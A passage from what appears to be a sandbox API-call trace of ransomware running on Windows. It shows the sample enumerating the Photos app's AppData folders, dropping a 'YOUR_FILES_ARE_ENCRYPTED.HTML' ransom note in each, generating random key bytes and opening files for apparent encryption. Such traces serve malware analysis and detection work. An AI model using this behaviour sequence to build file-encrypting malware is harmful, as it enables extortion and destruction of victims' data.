ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.506] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.506] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 0 [0119.506] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.506] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0119.506] GetProcessHeap () returned 0x600000 [0119.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.511] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.511] CloseHandle (hObject=0x31c) returned 1 [0119.512] GetProcessHeap () returned 0x600000 [0119.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.512] GetProcessHeap () returned 0x600000 [0119.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.512] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x215572b2, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x215572b2, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.512] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.512] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState") returned 98 [0119.513] GetProcessHeap () returned 0x600000 [0119.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.514] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState" [0119.514] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\*" [0119.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x215572b2, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.515] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x215572b2, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.515] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bf29d64, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6bf29d64, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6bfc26e7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="MediaDb.v1.sqlite", cAlternateFileName="MEDIAD~1.SQL")) returned 1 [0119.515] StrStrIW (lpFirst="MediaDb.v1.sqlite", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.515] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite") returned 116 [0119.515] PathFindExtensionW (pszPath="MediaDb.v1.sqlite") returned=".sqlite" [0119.515] lstrlenW (lpString=".sqlite") returned 7 [0119.515] PathFindExtensionW (pszPath="MediaDb.v1.sqlite") returned=".sqlite" [0119.515] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0119.520] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4096) returned 1 [0119.520] GetProcessHeap () returned 0x600000 [0119.520] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.523] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="C3") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3D") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AC") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="0F") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="71") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4D") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C1") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="EB") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="B0") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C6") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="DE") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="56") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="48") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="DD") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FD") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FA") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="BA") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0E") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="0B") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="76") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FD") returned 2 [0119.523] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="59") returned 2 [0119.523] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="BE") returned 2 [0119.523] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="20") returned 2 [0119.523] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="97") returned 2 [0119.523] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="AF") returned 2 [0119.523] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="85") returned 2 [0119.523] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="9A") returned 2 [0119.523] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="BB") returned 2 [0119.523] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="40") returned 2 [0119.523] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="DC") returned 2 [0119.523] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7C") returned 2 [0119.524] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite" [0119.524] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.524] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c00eae9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6c00eae9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23370df2, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="MediaDb.v1.sqlite-shm", cAlternateFileName="MEDIAD~3.SQL")) returned 1 [0119.524] StrStrIW (lpFirst="MediaDb.v1.sqlite-shm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.524] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm") returned 120 [0119.524] PathFindExtensionW (pszPath="MediaDb.v1.sqlite-shm") returned=".sqlite-shm" [0119.524] lstrlenW (lpString=".sqlite-shm") returned 11 [0119.524] PathFindExtensionW (pszPath="MediaDb.v1.sqlite-shm") returned=".sqlite-shm" [0119.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c00eae9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6c00eae9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x60920, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="MediaDb.v1.sqlite-wal", cAlternateFileName="MEDIAD~2.SQL")) returned 1 [0119.524] StrStrIW (lpFirst="MediaDb.v1.sqlite-wal", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.524] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal") returned 120 [0119.524] PathFindExtensionW (pszPath="MediaDb.v1.sqlite-wal") returned=".sqlite-wal" [0119.524] lstrlenW (lpString=".sqlite-wal") returned 11 [0119.524] PathFindExtensionW (pszPath="MediaDb.v1.sqlite-wal") returned=".sqlite-wal" [0119.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ca3f5b7, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2ca3f5b7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="PhotosAppTile", cAlternateFileName="PHOTOS~1")) returned 1 [0119.524] StrStrIW (lpFirst="PhotosAppTile", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.524] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile") returned 112 [0119.524] GetProcessHeap () returned 0x600000 [0119.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0119.525] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile" [0119.525] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\*" [0119.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ca3f5b7, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2ca3f5b7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a04b3e, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.526] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ca3f5b7, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2ca3f5b7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a04b3e, cFileName="..", cAlternateFileName="")) returned 1 [0119.526] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ca3f5b7, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2ca3f5b7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2ca3f5b7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a04b3e, cFileName="..", cAlternateFileName="")) returned 0 [0119.526] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.526] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0119.526] GetProcessHeap () returned 0x600000 [0119.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a84a0 [0119.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTile\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptile\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.527] WriteFile (in: hFile=0x320, lpBuffer=0x6a84a0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6a84a0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.528] CloseHandle (hObject=0x320) returned 1 [0119.528] GetProcessHeap () returned 0x600000 [0119.528] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a84a0 | out: hHeap=0x600000) returned 1 [0119.528] GetProcessHeap () returned 0x600000 [0119.528] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.528] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x65a97266, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65a97266, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="PhotosAppTracing_BGTask.etl", cAlternateFileName="PHOTOS~1.ETL")) returned 1 [0119.528] StrStrIW (lpFirst="PhotosAppTracing_BGTask.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.528] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl") returned 126 [0119.528] PathFindExtensionW (pszPath="PhotosAppTracing_BGTask.etl") returned=".etl" [0119.528] lstrlenW (lpString=".etl") returned 4 [0119.528] PathFindExtensionW (pszPath="PhotosAppTracing_BGTask.etl") returned=".etl" [0119.528] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x215572b2, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x215572b2, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x6c972108, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="PhotosAppTracing_BGTask.last.etl", cAlternateFileName="PHOTOS~2.ETL")) returned 1 [0119.528] StrStrIW (lpFirst="PhotosAppTracing_BGTask.last.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.528] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl") returned 131 [0119.528] PathFindExtensionW (pszPath="PhotosAppTracing_BGTask.last.etl") returned=".etl" [0119.528] lstrlenW (lpString=".etl") returned 4 [0119.528] PathFindExtensionW (pszPath="PhotosAppTracing_BGTask.last.etl") returned=".etl" [0119.528] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x215572b2, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x215572b2, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x6c972108, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="PhotosAppTracing_BGTask.last.etl", cAlternateFileName="PHOTOS~2.ETL")) returned 0 [0119.528] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.528] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0119.528] GetProcessHeap () returned 0x600000 [0119.528] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.529] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.530] CloseHandle (hObject=0x31c) returned 1 [0119.530] GetProcessHeap () returned 0x600000 [0119.530] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.530] GetProcessHeap () returned 0x600000 [0119.530] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.531] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0119.531] StrStrIW (lpFirst="Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.531] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe") returned 147 [0119.531] GetProcessHeap () returned 0x600000 [0119.531] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.532] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe" | out: 